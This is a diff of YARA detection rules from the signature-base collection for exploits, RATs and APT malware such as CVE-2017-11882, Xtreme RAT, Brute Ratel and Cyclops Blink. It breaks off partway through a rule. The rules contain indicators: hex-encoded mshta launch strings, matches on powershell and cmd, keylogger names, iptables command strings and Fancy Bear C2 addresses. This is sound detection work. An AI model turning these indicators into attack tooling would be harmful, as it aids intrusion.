 	meta:
-		description = "Detects suspicious office reference files including an obfuscated MHTML reference exploiting CVE-2021-40444"
+		description = "Detects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882"
 		author = "Florian Roth (Nextron Systems)"
-		id = "781cfd61-d5ac-58e5-868f-dbd2a2df3500"
-		date = "2021-09-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/decalage2/status/1438946225190014984?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L27-L41"
+		id = "400689ff-e856-5cbf-a7fa-93f6a8d8dbb9"
+		date = "2018-02-13"
+		modified = "2025-06-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L58-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "11a73572970d2d85d308330119a2c5243f2848ae78a861decdb0cdbde0d9d1c2"
-		score = 90
+		logic_hash = "729fa8215a24990371369158d4582cc0ba9387eb0e7221860bf7216046c447cb"
+		score = 60
 		quality = 85
-		tags = "CVE-2021-40444, FILE"
+		tags = "CVE-2017-11882, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$s1 = "109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#109;&#108" ascii wide
+		$x1 = "4d534854412e4558452068747470"
+		$x2 = "6d736874612e6578652068747470"
+		$x3 = "6d736874612068747470"
+		$x4 = "4d534854412068747470"
+		$s1 = "4d6963726f736f6674204571756174696f6e20332e30" ascii
+		$s2 = "4500710075006100740069006f006e0020004e00610074006900760065" ascii
+		$s3 = "2e687461000000000000000000000000000000000000000000000"
 
 	condition:
-		filesize < 25KB and all of them
+		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and filesize < 300KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_XML_Encoded_CVE_2021_40444 : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_EXP_Potential_CVE_2017_11882 : FILE
 {
 	meta:
-		description = "Detects possible CVE-2021-40444 with no encoding, HTML/XML entity (and hex notation) encoding, or all 3"
-		author = "James E.C, Proofpoint"
-		id = "4bf9ec64-c662-5c8f-9e58-12a7412ef07d"
-		date = "2021-09-18"
-		modified = "2021-09-19"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L44-L61"
+		description = "No description has been set in the source file - Signature Base"
+		author = "ReversingLabs"
+		id = "199710e0-5094-5940-ad29-f01383d5d8c2"
+		date = "2025-06-03"
+		modified = "2025-06-03"
+		reference = "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L82-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "feaeadd8e7e262f191ea0c2f85377531208262e5ac19d6706703e62cf8b4ec90"
-		score = 70
+		logic_hash = "a6e91e5b9807c94d32bac8a21c2c009320d16830155aae129a7fc2c67d393141"
+		score = 75
 		quality = 60
-		tags = "CVE-2021-40444, FILE"
+		tags = "FILE"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$t_xml_r = /Target[\s]{0,20}=[\s]{0,20}\["']([Mm]|&#(109|77|x6d|x4d);)([Hh]|&#(104|72|x68|x48);)([Tt]|&#(116|84|x74|x54);)([Mm]|&#(109|77|x6d|x4d);)([Ll]|&#(108|76|x6c|x4c);)(:|&#58;|&#x3a)/
-		$t_mode_r = /TargetMode[\s]{0,20}=[\s]{0,20}\["']([Ee]|&#(x45|x65|69|101);)([Xx]|&#(x58|x78|88|120);)([Tt]|&#(x74|x54|84|116);)/
+		$docfilemagic = { D0 CF 11 E0 A1 B1 1A E1 }
+		$equation1 = "Equation Native" wide ascii
+		$equation2 = "Microsoft Equation 3.0" wide ascii
+		$mshta = "mshta"
+		$http = "http://"
+		$https = "https://"
+		$cmd = "cmd" fullword
+		$pwsh = "powershell"
+		$exe = ".exe"
+		$address = { 12 0C 43 00 }
+		$fp1 = "Tested with chamber evacuated to 1E-8 Torr on turbo pump" wide
+		$fp2 = "d(3z2-r2) to d(x2-y2) is not experimentally identified yet in cuprates" wide
+		$fp3 = "Preliminary results of MD simulation of Oxygen cluster infusion into Nb" wide
+		$fp4 = "The Mixing is linked to the coefficients p and q" ascii
 
 	condition:
-		filesize < 500KB and $h1 and all of ( $t_* )
+		uint16( 0 ) == 0xcfd0 and $docfilemagic at 0 and any of ( $mshta , $http , $https , $cmd , $pwsh , $exe ) and any of ( $equation1 , $equation2 ) and $address and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_1 : WINDOWS CVE FILE
+rule SIGNATURE_BASE_SUSP_Themebleed_Theme_Sep23 : FILE
 {
 	meta:
-		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ffcaf270-f574-5692-90e5-6776c34eb71b"
-		date = "2021-09-18"
+		description = "Detects domain or IP placement in Windows theme files"
+		author = "@m_haggis, @nas_bench"
+		id = "76d0042b-655d-5d03-bcc4-150ebc92eb43"
+		date = "2023-09-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L64-L81"
+		reference = "https://github.com/gabe-k/themebleed"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2023_38146.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "fc8f0dd02460ab8f8cc6717c66eba51e6ed74881a48e92fd0bf978467dfb40e3"
-		score = 65
+		logic_hash = "577003741f07aeffafd2b0b22913de44ea4f5ed264f4104ee013104355f65311"
+		score = 75
 		quality = 85
-		tags = "WINDOWS, CVE, FILE"
+		tags = "FILE"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$xml_e = "Target=\"&#" ascii wide
-		$xml_mode_1 = "TargetMode=\"&#" ascii wide
+		$s1 = /Path=\\\\[0-9a-zA-Z\.-]{1,20}\\/
+		$s2 = "[VisualStyles]"
+		$s3 = "[Theme]"
 
 	condition:
-		filesize < 500KB and $h1 and 1 of ( $xml* )
+		filesize < 1MB and all of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_2 : WINDOWS CVE FILE
+rule SIGNATURE_BASE_SUSP_WER_Critical_Heapcorruption : FILE
 {
 	meta:
-		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+		description = "Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3c5ec4f-5d2a-523c-bd4b-b75c04bac87d"
-		date = "2021-09-18"
+		id = "2b1dad5f-cc2c-5d8c-8275-ebb56d079895"
+		date = "2019-10-18"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L83-L98"
+		reference = "https://twitter.com/cyb3rops/status/1185459425710092288"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_wer_files.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "82c70e0f0b72a57302e5853cc53ae18dbb0bc8dabdfd27b473a7664b2fc5e874"
-		score = 65
+		logic_hash = "efa84e375f31ca37b9dd9c7a74251929ac957b9bd530e92f74b8836f56048fea"
+		score = 45
 		quality = 85
-		tags = "WINDOWS, CVE, FILE"
+		tags = "FILE"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$a1 = "Target" ascii wide
-		$a2 = "TargetMode" ascii wide
-		$xml_e = "&#x0000" ascii wide
+		$a1 = "ReportIdentifier=" wide
+		$a2 = ".Name=Fault Module Name" wide
+		$s1 = "c0000374" wide
 
 	condition:
-		filesize < 500KB and all of them
+		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of them
 }
-rule SIGNATURE_BASE_Trojan_ISMRAT_Gen : FILE
+rule SIGNATURE_BASE_SUSP_WER_Suspicious_Crash_Directory : FILE
 {
 	meta:
-		description = "ISM RAT"
-		author = "Ahmed Zaki"
-		id = "e72241ce-d6ee-5cb7-a83d-157161938d83"
-		date = "2017-05-04"
+		description = "Detects a crashed application executed in a suspicious directory"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bf91e20c-aa35-5b13-86ed-a63e6fb4d1a2"
+		date = "2019-10-18"
 		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ism_rat.yar#L9-L25"
+		reference = "https://twitter.com/cyb3rops/status/1185585050059976705"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_wer_files.yar#L20-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c4d26f79b8110e92a5e427de303eca6eaf79765a4c9cc437864dc5160ef2e343"
-		score = 75
+		logic_hash = "a197feeafca38ffe33428fa807e2b80e3071ab8960926fc2f328748bda299910"
+		score = 45
 		quality = 60
 		tags = "FILE"
-		hash1 = "146a112cb01cd4b8e06d36304f6bdf7b"
-		hash2 = "fa3dbe37108b752c38bf5870b5862ce5"
-		hash3 = "bf4b07c7b4a4504c4192bd68476d63b5"
 
 	strings:
-		$s1 = "WinHTTP Example/1.0" wide
-		$s2 = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0" wide
-		$s3 = "|||Command executed successfully"
-		$dir = /Microsoft\\Windows\\Tmpe[a-z0-9]{2,8}/
+		$a1 = "ReportIdentifier=" wide
+		$a2 = ".Name=Fault Module Name" wide
+		$a3 = "AppPath=" wide nocase
+		$l1 = "AppPath=C:\\Windows\\" wide nocase
+		$l2 = "AppPath=C:\\Program" wide nocase
+		$l3 = "AppPath=C:\\Python" wide nocase
+		$l4 = "AppPath=C:\\Users\\" wide nocase
+		$s6 = "AppPath=C:\\Users\\Public\\" nocase wide
+		$s7 = "AppPath=C:\\Users\\Default\\" nocase wide
+		$s8 = /AppPath=C:\\Users\\[^\\]{1,64}\\AppData\\(Local|Roaming)\\[^\\]{1,64}\.exe/ wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of ( $a* ) and ( not 1 of ( $l* ) or 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Notable_Strings : FILE
+
+rule SIGNATURE_BASE_Xtreme_Sep17_1 : FILE
 {
 	meta:
-		description = "Detects notable strings identified within the Cyclops Blink executable"
-		author = "NCSC"
-		id = "81ccf582-41f5-5fe5-8afc-e008e01289ff"
-		date = "2022-02-23"
+		description = "Detects XTREME sample analyzed in September 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7517e237-9cad-5619-9028-4c7ab5463040"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L6-L37"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L14-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdd3a1de9d178370fcc66dbca4628d7bedfbc002bca9e463e11cb444302900ea"
+		logic_hash = "fa78b43f729032291c27f67dc53bd39a85c9a50323c7adf909ca2a8c5acdd861"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6"
 
 	strings:
-		$proc_name1 = "[kworker/0:1]"
-		$proc_name2 = "[kworker/1:1]"
-		$dns_query = "POST /dns-query HTTP/1.1\x0d\x0aHost: dns.google\x0d\x0a"
-		$iptables1 = "iptables -I %s -p tcp --dport %d -j ACCEPT &>/dev/null"
-		$iptables2 = "iptables -D %s -p tcp --dport %d -j ACCEPT &>/dev/null"
-		$sys_recon1 = "{\"ver\":\"%x\",\"mods\";["
-		$sys_recon2 = "uptime: %lu mem_size: %lu mem_free: %lu"
-		$sys_recon3 = "disk_size: %lu disk_free: %lu"
-		$sys_recon4 = "hw: %02x:%02x:%02x:%02x:%02x:%02x"
-		$testpath = "%s/214688dsf46"
-		$confpath = "%s/rootfs_cfg"
-		$downpath = "/var/tmp/a.tmp"
+		$x1 = "ServerKeyloggerU" fullword ascii
+		$x2 = "TServerKeylogger" fullword ascii
+		$x3 = "XtremeKeylogger" fullword wide
+		$x4 = "XTREMEBINDER" fullword wide
+		$s1 = "shellexecute=" fullword wide
+		$s2 = "[Execute]" fullword wide
+		$s3 = ";open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\" wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 8 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "735af2a144f62c50ba8e89c1c59764eb" or ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Module_Initialisation : FILE
+rule SIGNATURE_BASE_Xtreme_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects the code bytes used to initialise the modules built into Cyclops Blink"
-		author = "NCSC"
-		id = "c81b92c4-3f70-5bbd-acfa-ed1e1d33461d"
-		date = "2022-02-23"
+		description = "Detects XTREME sample analyzed in September 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b4878e80-54dc-5a16-9129-ddf2b1a5d287"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L39-L55"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L39-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bde37f642cf07e323beabaacd5c62f8422b451777fc1fc4a6bdf474db49de12"
+		logic_hash = "cb86167e0267d52b1b7503abd8f5b988296e3cde12453ace529c4e043d2ca69e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f8413827c52a5b073bdff657d6a277fdbfda29d909b4247982f6973424fa2dcc"
 
 	strings:
-		$ = {94 21 FF F0 93 E1 00 08 7C 3F 0B 78 38 00 00 ?? 7C 03
-      03 78 81 61 00 00 8E EB FF F8 7D 61 5B 78 4E 80 00 20}
+		$s1 = "Spy24.exe" fullword wide
+		$s2 = "Remote Service Application" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( any of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them )
+}
+rule SIGNATURE_BASE_Xtreme_Sep17_3 : FILE
+{
+	meta:
+		description = "Detects XTREME sample analyzed in September 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "160673ea-b263-520a-a1c1-da0f3e920f12"
+		date = "2017-09-27"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L55-L69"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "c110863028ab1f557270e52de608179ce582a47e0a20994f83d385ed285bda9a"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f540a4cac716438da0c1c7b31661abf35136ea69b963e8f16846b96f8fd63dde"
+
+	strings:
+		$s2 = "Keylogg" fullword ascii
+		$s4 = "XTREME" fullword wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Modified_Install_Upgrade : FILE
+
+rule SIGNATURE_BASE_Xtreme_RAT_Gen_Imp : FILE
 {
 	meta:
-		description = "Detects notable strings identified within the modified install_upgrade executable, embedded within Cyclops Blink"
-		author = "NCSC"
-		id = "4c4f7262-df74-5f6a-afc0-df1fcae4741c"
-		date = "2022-02-23"
+		description = "Detects XTREME sample analyzed in September 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "10b23099-2a87-5918-927b-f20bcba1cd70"
+		date = "2017-09-27"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L57-L88"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L71-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69b89dbaf3e2661f376ff1be7c19e96c82bf84fd572fea422c109f8afdd1e5aa"
+		logic_hash = "9cfd6473e7f8d1f899fe2cdbb49a4086ea7ac6151602d0964ed28b16d2d0188d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
-		hash3 = "7d61c0dd0cd901221a9dff9df09bb90810754f10"
-		hash4 = "438cd40caca70cafe5ca436b36ef7d3a6321e858"
-
-	strings:
-		$ = "/pending/%010lu_%06d_%03d_p1"
-		$ = "/pending/sysa_code_dir/test_%d_%d_%d_%d_%d_%d"
-		$ = "etaonrishdlcupfm"
-		$ = "/pending/WGUpgrade-dl.new"
-		$ = "/pending/bin/install_upgraded"
-		$ = {38 80 4C 00}
-		$ = {38 80 4C 05}
-		$ = {38 80 4C 04}
-		$ = {3C 00 48 4D 60 00 41 43 90 09 00 00}
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b5082bcc8487bb65c38e34c192c2a891e7bb86ba97281352b0837debee6f1cf"
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "d0bdf112886f3d846cc7780967d8efb9" or pe.imphash ( ) == "cc6f630f214cf890e63e899d8ebabba6" or pe.imphash ( ) == "e0f7991d50ceee521d7190effa3c494e" )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Core_Command_Check : FILE
+rule SIGNATURE_BASE_Gen_Trojan_Mikey : FILE
 {
 	meta:
-		description = "Detects the code bytes used to test the command ID being sent to the core component of Cyclops Blink"
-		author = "NCSC"
-		id = "46066474-7647-52fb-b40d-30ff8e285b6e"
-		date = "2022-02-23"
+		description = "Trojan Mikey - file sample_mikey.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff875436-4fed-5f20-a0a5-bfd146d93499"
+		date = "2015-05-07"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L90-L104"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mikey_trojan.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71c9da1f0e9e64be87293c985f2a4a59a6c87ffd127ce5104ebe95a0ccb316af"
-		score = 50
+		hash = "a8e6c3ca056b3ff2495d7728654b780735b3a4cb"
+		logic_hash = "5454953bba09d6fc866bcb23ef81a0b6763d8f82b8b606597548cbb5cf6053ed"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$cmd_check = {81 3F 00 18 88 09 00 05 54 00 06 3E 2F 80 00 (07|0A|0B|0C|0D) }
+		$s0 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS" fullword ascii
+		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)" fullword ascii
+		$x3 = "%d*%u%s" fullword ascii
+		$x4 = "%s %s:%d" fullword ascii
+		$x5 = "Mnopqrst Vwxyabcde Ghijklm Opqrstuv Xya" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 5 )
+		uint16( 0 ) == 0x5a4d and $s0 and 2 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Config_Identifiers : FILE
+rule SIGNATURE_BASE_HKTL_Bruteratel_Badger_Indicators_Oct22_4 : FILE
 {
 	meta:
-		description = "Detects the initial characters used to identify Cyclops Blink configuration data"
-		author = "NCSC"
-		id = "db5b3a4a-82c2-500a-88f6-340b3392eac8"
-		date = "2022-02-23"
+		description = "Detects Brute Ratel C4 badger indicators"
+		author = "Matthew @embee_research, Florian Roth"
+		id = "a62d08ae-0fb3-55e9-b6f8-7940f8032e4a"
+		date = "2022-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L106-L126"
+		reference = "https://twitter.com/embee_research/status/1580030310778953728"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_bruteratel_c4_badger.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6fa39442d717a69dd6f31a4bb2e5865c3f16156ce24a2b419d95ed751bb0d8ee"
+		logic_hash = "9af05225f462c8d4ec1fb14dc06bb789f76b0d818cb82c3dfcd5abc693727f33"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$ = {3C 00 3C 6B 60 00 3A 20 90 09 00 00}
-		$ = {3C 00 3C 63 60 00 3A 20 90 09 00 00}
-		$ = {3C 00 3C 73 60 00 3A 20 90 09 00 00}
+		$s1 = { b? 89 4d 39 8c }
+		$s2 = { b? bd ca 3b d3 }
+		$s3 = { b? b2 c1 06 ae }
+		$s4 = { b? 74 eb 1d 4d }
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		filesize < 8000KB and all of ( $s* ) and not uint8( 0 ) == 0x02
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0Xf_Command : FILE
+rule SIGNATURE_BASE_COZY_FANCY_BEAR_Hunt : FILE
 {
 	meta:
-		description = "Detects the code bytes used to check module ID 0xf control flags and a format string used for file content upload"
-		author = "NCSC"
-		id = "36646b7a-389d-5fd9-88a1-e43e7224763a"
-		date = "2022-02-23"
+		description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e81b4368-7383-5a48-a89a-f91b9306326e"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L128-L150"
+		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_dnc.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e3eebe404c8cd24e1e16eb3c881b1eda78ba6b365bf89c2557329e6f89396ac"
+		logic_hash = "9009f181eeecce0ae322ba24335426399cf4484dfc9b7ea6905fb163b4bf0a25"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
-		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {54 00 06 3E 54 00 07 FE 54 00 06 3E 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 07 BC 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 07 7A 2F 80 00 00}
-		$ = {54 00 06 3E 54 00 06 F6 2F 80 00 00}
-		$ = "file:%s\n" fullword
+		$s1 = "185.100.84.134" ascii wide fullword
+		$s2 = "58.49.58.58" ascii wide fullword
+		$s3 = "218.1.98.203" ascii wide fullword
+		$s4 = "187.33.33.8" ascii wide fullword
+		$s5 = "185.86.148.227" ascii wide fullword
+		$s6 = "45.32.129.185" ascii wide fullword
+		$s7 = "23.227.196.217" ascii wide fullword
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Default_Config_Values : FILE
+rule SIGNATURE_BASE_COZY_FANCY_BEAR_Pagemgr_Hunt : FILE
 {
 	meta:
-		description = "Detects the code bytes used to set default Cyclops Blink configuration values"
-		author = "NCSC"
-		id = "04067609-1173-51f2-907f-2a236aae6c7c"
-		date = "2022-02-23"
+		description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c5c8843-81ba-510c-82ed-4b6e2286bdb2"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_cyclops_blink.yar#L152-L174"
+		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
